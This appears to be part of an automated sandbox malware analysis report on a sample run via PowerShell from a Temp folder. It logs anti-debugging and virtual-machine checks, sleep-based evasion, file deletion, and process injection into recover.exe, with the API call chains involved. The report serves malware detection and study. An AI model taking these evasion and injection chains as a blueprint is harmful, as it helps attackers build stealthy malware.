Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain checking for user administrative privileges

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Check user administrative privileges: IsUserAndAdmin, DecisionNode

graph_6-70898

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Memory allocated: 1480000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Memory allocated: 2F50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Memory allocated: 4F50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Memory allocated: 55F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Memory allocated: 65F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Memory allocated: 6720000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Memory allocated: 7720000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\recover.exe

Code function: 9_2_0040BAE3 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,

9_2_0040BAE3

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

6_2_0041A941

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3586	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 538	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Window / User API: threadDelayed 3300	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Window / User API: threadDelayed 6667	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_6-69045

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_6-71488

Source: C:\Windows\SysWOW64\recover.exe

API coverage: 9.7 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6788	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6748	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe TID: 6848	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe TID: 6820	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe TID: 6924	Thread sleep count: 3300 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe TID: 6924	Thread sleep time: -9900000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe TID: 6924	Thread sleep count: 6667 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe TID: 6924	Thread sleep time: -20001000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_004090DC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	6_2_004090DC
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_0040B6B5 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	6_2_0040B6B5
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_0041C7E5 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	6_2_0041C7E5
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_0040B8BA FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	6_2_0040B8BA
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_0044E989 FindFirstFileExA,	6_2_0044E989
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_00408CDE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	6_2_00408CDE
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_00419CEE FindFirstFileW,FindNextFileW,FindNextFileW,	6_2_00419CEE
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_00407EDD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	6_2_00407EDD
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_00406F13 FindFirstFileW,FindNextFileW,	6_2_00406F13
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_04AE10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	6_2_04AE10F1
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_04AE6580 FindFirstFileExA,	6_2_04AE6580
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_10005B50 FindFirstFileW,FindNextFileW,FindNextFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	6_2_10005B50
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_10007E40 Sleep,FindFirstFileW,RemoveDirectoryW,FindNextFileW,RemoveDirectoryW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	6_2_10007E40
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_10019083 FindFirstFileExA,	6_2_10019083
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_10007510 FindFirstFileW,FindNextFileW,CreateFileW,FindNextFileW,FindClose,CloseHandle,FindClose,	6_2_10007510
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0040B477 FindFirstFileW,FindNextFileW,	9_2_0040B477
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	10_2_00407EF8
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	11_2_00407898

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 6_2_00407357 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

6_2_00407357

Source: C:\Windows\SysWOW64\recover.exe

Code function: 9_2_0041A8D8 memset,GetSystemInfo,

9_2_0041A8D8

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000006.00000002.3960156571.00000000015DA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000006.00000002.3959743316.0000000001558000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000004.00000002.1527297764.0000000001263000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_

Source: C:\Windows\SysWOW64\recover.exe

API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 6_2_0043B88D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

6_2_0043B88D

Source: C:\Windows\SysWOW64\recover.exe

9_2_0040BAE3

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

6_2_0041D0CF

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_004438F4 mov eax, dword ptr fs:[00000030h]	6_2_004438F4
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_04AE4AB4 mov eax, dword ptr fs:[00000030h]	6_2_04AE4AB4
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_1001502C mov eax, dword ptr fs:[00000030h]	6_2_1001502C

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 6_2_00411999 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,SetLastError,SetLastError,

6_2_00411999

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_00435398 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_00435398
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_0043B88D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_0043B88D
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_00434D6E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00434D6E
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_00434F01 SetUnhandledExceptionFilter,	6_2_00434F01
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_04AE2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_04AE2639
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_04AE60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_04AE60E2
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_04AE2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_04AE2B1C
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_1000B279 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_1000B279
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_1000DD9A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_1000DD9A
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_1000AFB3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_1000AFB3

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 6_2_00418267 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,GetLastError,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,

6_2_00418267

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Memory written: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: NULL target: C:\Windows\SysWOW64\recover.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: NULL target: C:\Windows\SysWOW64\recover.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: NULL target: C:\Windows\SysWOW64\recover.exe protection: execute and read and write	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Memory written: C:\Windows\SysWOW64\recover.exe base: 2D89008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Memory written: C:\Windows\SysWOW64\recover.exe base: 2C46008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Memory written: C:\Windows\SysWOW64\recover.exe base: 6B9008	Jump to behavior

